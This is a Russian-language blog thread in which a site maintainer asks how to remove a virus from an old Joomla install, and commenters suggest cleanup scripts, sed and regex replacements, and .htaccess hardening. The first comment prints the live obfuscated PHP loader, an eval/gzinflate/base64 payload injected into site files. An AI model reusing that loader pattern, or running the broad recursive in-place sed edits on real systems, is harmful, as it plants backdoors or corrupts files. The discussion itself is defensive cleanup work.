GD Star Rating
loading...

Народ, который работает с Joomla, помогите, пожалуйста.
На сайте завелся вирус. Пример его – внутри поста. Вопрос такой – можно ли его вычистить как-то автоматом, млм нужно сидеть и чистить каждый файл. И где чистить – только вначале файла, или есть ещё места, где он может быть?

Joomla и вирус, 5.0 out of 5 based on 1 rating
Tagged with →  

78 Responses to Joomla и вирус

  1. Hctam:

    <?php
    $md5 = “bdb5bd5befa0099d1d4cf540a1acf975”;
    $ad = array(‘4′,”g”,”o”,”a”,”r”,’t’,’d’,’b’,’c ‘,”n”,’v’,’i’,”_”,’;’,’z’,”$”,’s’,’f’,”e “,”l”,”6″,'(‘,’)’);
    $bd5 = create_function(‘$’.’v’,$ad[18].$ad[10]. $ad[3].$ad[19].$ad[21].$ad[1].$ad[14].$a d[11].$ad[9].$ad[17].$ad[19].$ad[3].$ad[ 5].$ad[18].$ad[21].$ad[7].$ad[3].$ad[16].$ad[18].$ad[20].$ad[0].$ad[12].$ad[6].$ ad[18].$ad[8].$ad[2].$ad[6].$ad[18].$ad[ 21].$ad[15].$ad[10].$ad[22].$ad[22].$ad[ 22].$ad[13]);
    $bd5(‘DZRHDqRYAgWP09ViASReo1lgE5d4+MBmhP fec/qpG8ST4kVxJv2f6m3Gsk/24k+abAWJ/y8vsi kv/vwj5I4sLDdgO8Eh8gqwpKBs7VXFWNtV3aArR5 YFDAOzWI7kyvZSJXRgQ7RBmH3CJ9kDRG5g+tDT36 KfMO1mfeZIyN6btCz9nDJ3WBy7EdDo6YsRyGe1s/ EtVTe4HzfcDO3r2yl3YS0tdQvHOBFZZZh4Xy0WhR 4W9C6Yf+Z4SbXikwiOXb0UMbuKVo66iRZ9ZA3FRO NacH5vvSRsBgD+8GLQHCdV0yQyu2fxhSAGTwtDJy V/izqqL5qo0NyegowD4b8JZCPLEyrSkx2S8NiqrH dmRNhEqUsxqG7J+81Jr6tg0ReX4g6rt1CkOwvh7u OanZxWeHCEpYYxwkz/d2csEQJ1vtCj2lpgI67HJU ooauhbRDC3PIX4yYg4jyhq78uGXoLizuhRo1SLqk QzKMIyxGhAB1jpq2h3NYg1VeF0a4qHJrL51SQ576 M+Ra/ILlw2FuSt0IV0kHuVcHIf6c0i4npTYiLSnt KMjBTwAvtH2J/OiEkJh/utn7xrXJeXy4NfGHwOlc USGilCRo0x5+f0mrP9VLbPxicb/YEyZ9Z49A+FZ5 5ybIXL4fjsoOBm9hsW421CAffZHYyENoo5S5pBO7 uLcTmz33J5ryIQitCIwnPc0yQuueZg3o6A2Q65fB B0O1WXd1JltbJsZIu0SS2OzgcdwFec99a5iMohyk c5xVYuiFIeisPUTMbjbGM3sALkuePkR5mmilj6iw R3o4LDMODEifQptfbTkU3PCrW49dOX7tAQSXVy1l 08WsMz0rhgTtApTB2t0llp1Msf4jpItisr9xlLz3 xnEYbFUa3SNjXR+yS7qjFhgtlUuyXki4qqK7rTxJ 3w46Lg1LASptEsQ/DaWTMh3uqxmvIjZdsIAj0T/S bFs02zQ18IHopChOQlqkPZFzzqfcvbvh7k2i1V6q JuUNOUL2MWmarwk+mrMuluJ83RsJut/uIi7P/sXr FAa3NNt0cK5de/GG0Zg7dElab0sgJjJ4JUb6l28H TWEOWcuV7FXfl3x9f1iEa+PDkURx8aPiFUOjjtUk lsxYslcjLpdV8Uagq0s94q5vtV3yS2w7uAedL6GY MuEZXpC154bphu9O2d14qP8Z3SqwXCQ0O2vWS/eZ zGU31y2LP1oNi/aU19YRG3yw6TzbytOeZSPUXk0V zFN3RAZcUP5dhdlMYiniq37fCbDzd9RgKMFAE2+5 tV9hpbrXhpg91tQ8bAIMriuhVjRKoU0yj4Yl9XwB Yjkzf6/O2pCVgBbWi3nBgULJmgJ/Q5cWdHWPX41Z Lfkc7To6Y8tuelDWkEbWf8FXB/OTEjw+rzonOliO dcE0kGRXTZe52fZTdygKvx1Gx/k5E/xLzVBLSBzV D2Fq7UYIDeE2he+wzZqWl763+B1WE3RPSkj8n2Xm vUL8yVQGFgx92LCyzz94ObLzbbdZ5wwCD7ybRLdC eHXp3jfpNvGnd8C4gwY0uitrYrx++tmMvtTjhZqV zJuso2WwoslM9yOtMI3OyurItCmhVS9jk8Toc1x0 MU2Bu42LC2fnlmym/gSIIVhS5c08Fazd/DYxAtg0 8FasQpuNdMbQxzAxIABBL5jttAdqQTF/edbrXIXs Wtc5ftJipQyTVHKnjCiBxF4YO7h2GRiMNEnlrYq+ u22CXSQLOwHLtJIMhUsi8VxMe7zLmfTyus06zP6B dhgbHVq7utpy+uskNNyUBcEjX+8uNZRhGct9Ps/A iBWIa3ERQUWJqiQZWH9hcEER80QPT+bm7QeZeZAG yQT/6jRhb2ET8Y3hZ8/LWp5lYPLOoeU/iCv+uhbD zbot5CeqwOyDsmtYqWiUji7IOifHuqJzJ0T3U6fe Dc0A28WXybK/jBUZHwiAWopDrO63PSOLHn6Uqk95 F9Je7loSRPAWIFZNGRd7cU5IWGO/Zqf31QFLnamW khdiefe2/fNFG8Tqd2zh4SsrmZfgJqyRbrv/N8+L aV/IjX3AIaNr/T37Oc5iecgny9xxXih13g3SweKS iyg/E5Z7x88ElkB0LHe7m04ueTT5YwnRmowWu32/ 03sh7kScKJowmsmhkWATahBX7H9hgJaWBqejfVqy ZGUVJHasPA53muGAxBRVnC1++///z777//+T8=’) ;? >
    <?
    ////////////////////////////////////////
    // ‘‡?? ?? ?‡???‡ ‰?????·???‚‡:
    // CMS “Joomla 1.0.8.2 RUS Paranoia MCE”
    // —·???‡ “March Cat Edition”
    // ?‡?‡ ‚?????‡: 13.03.2006
    // –????‡? ‚????? ?? AndyR
    // ???‡???‡??? ? ?·???‡ ‰?????·???‚‡:
    // http://andyr.mrezha.ru
    // mailto:[email protected]
    //////////////////////////////////////?>

  2. Hctam:

    Ой, кодировка не та. Но не важно. Подобное – в начале каждого файла. И, хостеры говорят, порывается что-то куда-то рассылать сайт.

  3. ZloCap:

    Для начала нужно найти файлы, которых нет в твоей локальной копии. Во вторых не стоит пользоваться компонентами которым уже много лет и они не обновляются.

  4. Hctam:

    это не мой сайт. У меня нет локальной копии. Удалить полностью какие-то компоненты я не могу.

  5. RanEbb:

    sed тебя спасет

  6. KkeNo:

    сузить круг иногда можно по дате изменения файла

  7. Hctam:

    можно чуть подробнее? Чтобы я спросил у Гугля, где почитать про sed, я должен понять, что такое sed

  8. Drablack:

    Я подобное чистил локально, с помощью Notepad++, но это помогает только в тех случаях, когда вредоносный код везде одинаковый

  9. Drablack:

    подобная срань обычно прописывается во все php-файлы одновременно, поэтому дата мало что скажет

  10. 0tsNix:

    ssh доступ есть?

  11. 0tsNix:

    И что у тебя в файле /home/uahorse/data/www/virainfo.uahorses.com/mambots/editors/tinymce/jscripts/ti ny_mce/plugins/autosave/langs/65f.php?

  12. Hcion:

    не только tinymce, jce тоже дырявый.
    Автор, прежде всего ищи странные картинки. Просмотри и js файлы.
    Общаая рекомендация (и самая действенная) – запретить выполняться картинкам. С помощью апача, например.

  13. Hcion:

    в папках с картинками кладем.htaccess файлик:

    php_flag engine off
    RemoveHandler.phtml.php.php3.php4.php5.p hp6.phps.cgi.exe.pl.asp.aspx.shtml.shtm. fcgi.fpl.jsp.htm.html.wml
    AddType application/x-httpd-php-source.phtml.php.php3.php4.php5.php6.php s.cgi.exe.pl.asp.aspx.shtml.shtm.fcgi.fp l.jsp.htm.html.wml

  14. 0tsNix:

    Это файл инклюдит код из первого сообщения, вот я про него и спросил

  15. Xxxre:

    Антон, нахуячь ему скрипт уже.

  16. 0tsNix:

    Он еще не ответил про доступ по ssh.

  17. Hcion:

    вместо того чтобы охать, как старая бабка, объяснил бы. Будь конструктивней и не кокетничай.
    Я вот ни разу не юниксоид, но когда взломали 18 сайтов у хостера, этими методами добился безопасности.

  18. Hcion:

    в общем случае хакером из гугля ищется компонента, которая может аплоадить картинки. А таких до хера. Потом эта ‘картинка’ выполняется.

  19. 0tsNix:

    Можно узнать, как ты узнал, что «добился безопасности»?

  20. 0tsNix:

    Сдается мне, что ты не безопасник.

  21. Xxxre:

    начнем с того, что он нигде не писал, что у него апач.
    и делать выводы, что этот метод подействует – несколько странно.
    Что касается выполнением картинок с помощью модуля похапэ – это я не знаю, каким мудаком надо быть, чтобы так настроить.
    Метод один – скриптом вычистить говно из файлов и запретить их модификацию.
    Хотя я не знаю, как там жумла устроена, может ей надо через веб-интерфейс содержимое модулей менять, но это вряд ли.

  22. Hcion:

    Тем, что есть несколько коммерческих сайтов, которых целенаправленно добиваются. Ради интереса, могу убрать.htaccess файлы – сайты будут взломаны через несколько часов – проверял.
    А что, есть что-то дельное сказать?

  23. Hctam:

    доступ только по FTP и Control Panel хостера

  24. Hcion:

    это хорошо, что ты с этим всем не сталкивался 🙂 Хотя охаешь.
    Скриптом через ssh не всегда получится.
    Запрет модификации – это единственная полезная информация в твоем теоретическом мессадже.

  25. Xxxre:

    куда нам, хули.
    Скриптом через ssh не всегда получится.

    это почему?

  26. 0tsNix:

    Ты прикрыл одну дыру, а не обеспечил безопасность. Прикрыл, надо сказать, странно. У тебя же nginx перед апчачем (если нет, то разговаривать дальше не о чем), так зачем отдавать картинки апачем?

  27. Hcion:

    не то, что бы я придираюсь, но для начала читаем требования joomla к хостингу, а потом пишем типа – начнем с того, что ты пиздоглазое мудило 🙂
    Что касается выполнением картинок с помощью модуля похапэ
    Это сейчас ты обосрал походя миллионное сообщество joomla (да и не только joomla).

  28. Xxxre:

    Тох, да там говнохостинг скорее всего, без возможности поставить свое приложение.
    зато десять долларов в месяц всего!

  29. Hcion:

    а потому что он может быть разный, как у меня. И не надо у него просить доступ по ssh, это совершенно необязательно, можно просто подсунуть ему некий replace.php и выполнить.

  30. Xxxre:

    а спорим на штуку евро, что я смогу запустить joomla без использования апача?

  31. Xxxre:

    выполнить пхп, чтобы очистить пхп, и запретить изменения пхп.
    это за гранью, я покидаю пост.

  32. Hcion:

    эй-эй, тебя чего-то не туда несет 🙂 человек помощи попросил, а ты обосрал всё что можно, устраиваешь тут развод на штуку евро и покидаешь пост.

  33. 0tsNix:

    Безопасность и говнохостер это как бы взаимоисключающие параграфы.

  34. Hcion:

    на, забери с собой
    0) {
    global $i;
    ++$i;
    echo ““.$i.$filename.”:
    “.htmlspecialchars($buff[0], ENT_QUOTES).”
    “;
    if($GLOBALS[‘del’]){
    $code = $buff[0];
    $file_buff = str_replace($code, ”, $text);
    echo “ept rabotaet”;
    $file=fopen($filename,”w”);
    if (fwrite($file,$file_buff))
    {
    echo ‘исцелен!!’;
    }
    else {
    echo ‘Ошибка!’;
    }
    fclose($file);
    }
    $GLOBALS[‘num_infected’]++;
    }else
    {
    }
    echo “
    “;
    };
    dir_walk(‘del_virus’, $dir, array(‘js’), true, $dir );
    echo “Всего заражено = $num_infected
    “;?>
    ody>

  35. Hcion:

    сука парсер

  36. Hctam:

    Ребят, а кромме того, чтобы на будущее прикрыть исполнение “картинок”, сейчас сделать что-то можно, чтобы автоматизированно почистить скрипты?

  37. Hcion:

    тут в посте речь идет о joomla. БЕСПЛАТНЫЙ движок для сайта.

  38. Hcion:

    больше всего в таких говнохостерах удручает то, что взломав один сайт, хакер начинает шуровать по всем остальным в каталоге. Как этого избежать?

  39. 0tsNix:

    Сменить хостера, либо научить/заставить админов хостинга работать. Первый вариант более реалистичен.

  40. Hcion:

    неизвестно, как тебе будет лучше, смотри сам:
    https://www.google.ru/webhp?sourceid=chr

  41. 0tsNix:

    который исполняется бесплатным php на бесплатном линуксе. УЖАС!

  42. Hcion:

    нечто вроде отдельных аккаунтов внутри ресселинга..

  43. 0tsNix:

    Если файлов не сильно много – скачиваешь себе все, чистишь подручными средствами, заливаешь обратно. Если много – придется писать php скрипт, который проходится по директориям и ищет base64 в файлах.

  44. Hcion:

    тебе предстоит большая работа 🙂 Я проходил через это. И надо обновить движок, эта Паранойя семилетней давности. И, помнится, со скрытыми линками на давно дохлые сайты.

  45. Hcion:

    много, в joomla до хренища файлов, порядка 2000, без дополнительных модулей и компонент.

  46. Drablack:

    если быть точным – Файлов: 4 882; папок: 1 138 (Joomla 2.5.9)

  47. 0tsNix:

    не надо мне рассказывать про джомлу, 2000 файлов за часок должны стянуться.

  48. RanEbb:

    это текстовый редактор потоковый
    http://ru.wikipedia.org/wiki/Sed
    а в связке с awk можно вообще стихи писать при желании 🙂

  49. RehPhone:

    en / ru / чей-то расширенный мануал
    если коротко, то предложили залезть по ssh и прогнать регулярку по всем файлам.

  50. Hcion:

    человек к вам починить жигули принес, не забывайте. Зачем вы ему шасси от мерседеса подсовываете?

  51. Hcion:

    можно просто в ssh
    find / -name “*.js” -type f -print0 | xargs -0 sed -i ‘s/try{q=document.createElement.*}/#cle aned/g’

  52. RehPhone:

    ну по логике источник должен быть самым первым из недавно модифицированных

  53. Hcion:

    Самый простой способ – удалить сайт по ftp. Вирус не удалится, останется (в большинстве случаев).

  54. Hctam:

    по SSH доступа нет, я выше написал. Похоже, придется чистить вручную. Но там дофига файлов и, главное, нет гарантии, что я сам всё нормально вычищу.

  55. RanEbb:

    слей себе, прогони седом, залей обратно

  56. Drablack:

    пришли в пост архив, сделаю за пиво

  57. Hctam:

    Во Франция “Оболонь” буду слать? 😉

  58. Drablack:

    разберемся

  59. Drablack:

    Мой мозг в данный момент не в состоянии осилить регулярку, прошу помощи!

    Нужно найти следующее:

    чтоугоднонасколькоугоднострок$ad = arrayчтоугоднонасколькоугоднострок?>

  60. Drablack:

    парсер лох

  61. RehPhone:

    включи PCRE_DOTALL, либо сделай через класс отрицания

  62. Drablack:

    Чуваки, помогите с регуляркой для notepad++

    Как найти такую ебалду?

  63. RehPhone:

    в 6.3 отметь галкой ‘. matches newline’ и попробуй вот это. Там может еще первый квантификатор ковырять надо, хз.

  64. Drablack:

    заебок, нашло. Поставил заменять.

  65. RehPhone:

    ты бэкап-то хоть сделал на всякий?

  66. Drablack:

    да, мне Егорыч архивом скинул же

  67. RARNo:

    писать в блоге кот – дело неблагодарное

  68. RARNo:

    “ну хоть что-то у нас в безопасности”

  69. KkeNo:

    я как-то вычищал ворпдресс, там достаточно четко было видно, где вирус прописался, а где старые нетронутые файлы. другой вопрос, что пока юзвери не сменил пароль с 123456 на что-то нормальное, он возвращался… git init + git status решили вопрос дальнейших наблюдений

  70. UrxSpb:

    Обычно я пишу файловый сканер с регуляркой. Цена вопроса 15 минут.

  71. TfoMega:

    Один раз лечил такое одному мудаку (у него пароль был 11111, не было бекапов и не заплатил по договору). В итоге пхп-вставки регуляркой вычистил, но там оказалось спрятано ещё 3 шелл-закладки.

    Мораль: лучше снести всё и сделать с нуля, и делать бекапы ещё )))

  72. Ylfen:

    ?‡?‡ ‚?????‡: 13.03.2006

    настоящая проблема не в вирусах, а в уязвимостях семь лет не обновлявшегося движка

  73. Hcion:

    я потом ещё закладку нашел. Была в templates от предыдущего работника.

  74. RanEbb:

    кстати, да
    git/hg – отличное лечение от таких случаев

Добавить комментарий